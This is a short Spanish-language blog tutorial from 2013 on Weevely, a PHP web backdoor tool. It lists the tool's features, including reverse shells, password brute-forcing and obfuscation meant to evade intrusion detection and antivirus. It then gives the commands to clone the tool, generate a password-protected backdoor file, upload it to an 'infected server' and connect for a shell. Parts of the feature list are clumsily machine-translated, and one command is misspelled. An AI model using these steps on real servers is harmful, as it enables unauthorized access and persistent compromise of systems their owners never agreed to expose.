martes, 2 de julio de 2013

Tutorial.-Weevely

Weevely Backdoor





Weevely es una herramienta de post-explotación de web , con la que conseguir acceso a un servidor por completo.

Los nuevos módulos para la nueva version 0.7 son

  • More than 30 modules to automatize administration and post exploitation

  1. Ejecutar comandos y navegue sistema de archivos remoto, incluso con restricción de seguridad de    PHP.
  2. Auditoría de errores de configuración de servidor comunes.
  3. Ejecutar consola SQL pivotante en la máquina de destino.
  4. Abrir proxy HTTP para hacer un túnel a través de su tráfico de destino.
  5. Fácil transferencia de archivos desde y hacia el objetivo.
  6. Engendro conchas TCP inversa y directa.
  7. Fuerza bruta las contraseñas de los usuarios del sistema de destino.
  8. Ejecutar escaneo de puertos de equipo de destino.
  9. Comunicaciones de puerta trasera se ocultan en las cookies HTTP.
  10. Las comunicaciones son ofuscado para eludir la detección NIDS firma.
  11. Backdoor código polimórfico PHP se ofusca para evitar HIDS detección AV.
  12. etc....=)Bu
 ¿Donde lo Descargamos ? 
Bueno , hay varias formas, yo os dire que lo podeis clonar con "git", lo que yo hize , ponemos este comando para clonarlo....
 git clone https://github.com/epinna/Weevely Weevely
 Bueno, es sencillo no? colocan eso y weevely estara en su carpeta llamada Weevely, sencillo? por si no les gusta esta forma acá les dejo la web  , para que escojan la suya 
http://epinna.github.io/Weevely/
 Usando Weevely.

Bueno entramos en la carpeta, y para hacer un pequeño backdoor , sencillito , colocamos lo siguiente : 
 Python weevely.py generate "Contraseña"  "Ruta del archivo"
Bueno, con eso , hariamos un backdoor, un ejemplo seria así : 


Python weevely.py generate hacker /home/icebreaker/Escritorio/backdoor.php

y así lo creamos , lo subimos al servidor infectado , una vez hecho esto  para conectarnos, lo hacemos de la siguiente forma con el siguiente comando...
 python weevli "web+el backdoor" "contraseña"
Y así conseguimos una shell , probamos poniendo ls .......


Bueno , y acá se puede ver conectado espero que les gustes y happy hacking! :-D